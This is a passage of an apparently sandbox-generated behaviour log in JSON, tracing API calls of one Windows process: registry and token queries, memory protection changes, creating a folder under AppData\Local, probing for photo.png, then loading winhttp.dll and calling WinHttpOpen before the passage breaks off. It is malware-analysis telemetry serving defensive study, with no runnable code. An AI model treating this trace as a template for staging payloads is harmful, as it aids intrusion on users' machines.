"timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "DefinitionFlags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\DefinitionFlags" + } + ], + "repeated": 0, + "id": 363 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "Attributes" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\Attributes" + } + ], + "repeated": 0, + "id": 364 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "FolderTypeID" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\FolderTypeID" + } + ], + "repeated": 0, + "id": 365 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "ValueName", + "value": "InitFolderHandler" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\InitFolderHandler" + } + ], + "repeated": 0, + "id": 366 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 367 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 368 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000310" + }, + { + "name": "ObjectAttributesName", + "value": "PropertyBag" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F1B32785-6FBA-4FCF-9D55-7B8E7F157091}\\PropertyBag" + } + ], + "repeated": 0, + "id": 369 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000310" + } + ], + "repeated": 0, + "id": 370 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 371 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "D\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xa4\\xf3\\x19\\x00\\xdb\\x9e\\x06s\\xa8c%s$\\xb6,s\\xfc\\x91|\\x028\\xe9's\\xf4\\xf3\\x19\\x00\\x00\\x00\\x1a\\x00\\xc3\\x07)\\x02d\\xf3\\x19\\x00\\x02\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 372 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000310" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\REGISTRY\\USER\\S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 373 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 374 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000030c" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "KEY_QUERY_VALUE" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000310" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" + } + ], + "repeated": 0, + "id": 375 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000314" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "KEY_QUERY_VALUE" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000030c" + }, + { + "name": "ObjectAttributesName", + "value": "SessionInfo\\1" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1" + } + ], + "repeated": 0, + "id": 376 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "KEY_QUERY_VALUE" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000314" + }, + { + "name": "ObjectAttributesName", + "value": "KnownFolders" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\KnownFolders" + } + ], + "repeated": 0, + "id": 377 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000314" + } + ], + "repeated": 0, + "id": 378 + }, + { + "timestamp": "2025-03-07 21:41:19,140", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x04\\xf5\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xfe\\xff\\xff\\xff\\x84\\xf5\\x19\\x00-\\xf6\\x97t\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00<\\xf6\\x97t\\x84\\xcb\\x8dt\\xa8\\xf5\\x19\\x00\\xa4\\xf5\\x19\\x00\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 379 + }, + { + "timestamp": "2025-03-07 21:41:19,156", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000314" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\REGISTRY\\USER\\S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 380 + }, + { + "timestamp": "2025-03-07 21:41:19,156", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000318" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000314" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" + } + ], + "repeated": 0, + "id": 381 + }, + { + "timestamp": "2025-03-07 21:41:19,156", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000314" + } + ], + "repeated": 0, + "id": 382 + }, + { + "timestamp": "2025-03-07 21:41:19,156", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000318" + }, + { + "name": "ValueName", + "value": "Local AppData" + }, + { + "name": "Type", + "value": "2", + "pretty_value": "REG_EXPAND_SZ" + }, + { + "name": "Information", + "value": "%USERPROFILE%\\AppData\\Local" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Local AppData" + } + ], + "repeated": 0, + "id": 383 + }, + { + "timestamp": "2025-03-07 21:41:19,156", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "10" + }, + { + "name": "TokenInformation", + "value": "g\\x95\\x1d\\x00\\x00\\x00\\x00\\x00\\xcd7\\x03\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\xa8\\x95\\x1d\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 384 + }, + { + "timestamp": "2025-03-07 21:41:19,156", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x88\\x8aK\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 385 + }, + { + "timestamp": "2025-03-07 21:41:19,156", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "__notification__", + "api": "sysenter", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadIdentifier", + "value": "9452" + }, + { + "name": "Module", + "value": "KERNELBASE.dll" + }, + { + "name": "Return Address", + "value": "0x756e413c" + } + ], + "repeated": 0, + "id": 386 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000314" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" + } + ], + "repeated": 0, + "id": 387 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000314" + }, + { + "name": "ValueName", + "value": "es-ES" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES" + } + ], + "repeated": 0, + "id": 388 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000314" + } + ], + "repeated": 0, + "id": 389 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000314" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" + } + ], + "repeated": 0, + "id": 390 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000314" + }, + { + "name": "ValueName", + "value": "es-ES" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES" + } + ], + "repeated": 0, + "id": 391 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000314" + } + ], + "repeated": 0, + "id": 392 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000029c" + }, + { + "name": "ValueName", + "value": "es-ES" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es-ES" + } + ], + "repeated": 0, + "id": 393 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000029c" + }, + { + "name": "ValueName", + "value": "es" + }, + { + "name": "Type", + "value": "1", + "pretty_value": "REG_SZ" + }, + { + "name": "Information", + "value": "{0000002B-57EE-1E5C-00B4-D0000BB1E11E}" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\es" + } + ], + "repeated": 0, + "id": 394 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000308" + } + ], + "repeated": 0, + "id": 395 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000318" + } + ], + "repeated": 0, + "id": 396 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "filesystem", + "api": "NtQueryAttributesFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\Local" + } + ], + "repeated": 0, + "id": 397 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 398 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "KEY_QUERY_VALUE" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" + } + ], + "repeated": 0, + "id": 399 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 400 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "KEY_QUERY_VALUE" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\KnownFolderSettings" + } + ], + "repeated": 0, + "id": 401 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 402 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 403 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243151f", + "parentcaller": "0x02431642", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74e25000" + }, + { + "name": "ModuleName", + "value": "windows.storage.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 404 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243155e", + "parentcaller": "0x02431642", + "category": "misc", + "api": "GetUserNameA", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Name", + "value": "admin" + } + ], + "repeated": 0, + "id": 405 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243156c", + "parentcaller": "0x02431642", + "category": "filesystem", + "api": "CreateDirectoryW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DirectoryName", + "value": "C:\\Users\\pacop\\AppData\\Local\\admin" + } + ], + "repeated": 0, + "id": 406 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x0243101d", + "parentcaller": "0x00000000", + "category": "filesystem", + "api": "NtCreateFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x80100080", + "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "C:\\Users\\pacop\\AppData\\Local\\admin\\photo.png" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "0" + }, + { + "name": "FileAttributes", + "value": "0x00000000" + }, + { + "name": "ExistedBefore", + "value": "no" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 407 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "winhttp.dll" + }, + { + "name": "BaseAddress", + "value": "0x72d80000" + } + ], + "repeated": 0, + "id": 408 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\OnDemandConnRouteHelper" + }, + { + "name": "DllBase", + "value": "0x73510000" + } + ], + "repeated": 0, + "id": 409 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll" + }, + { + "name": "BaseAddress", + "value": "0x73510000" + } + ], + "repeated": 0, + "id": 410 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "unload" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\OnDemandConnRouteHelper" + }, + { + "name": "DllBase", + "value": "0x73510000" + } + ], + "repeated": 0, + "id": 411 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "winhttp.dll" + }, + { + "name": "BaseAddress", + "value": "0x72d80000" + } + ], + "repeated": 0, + "id": 412 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431678", + "parentcaller": "0x00000000", + "category": "network", + "api": "WinHttpOpen", + "status": true, + "return": "0x004f9180", + 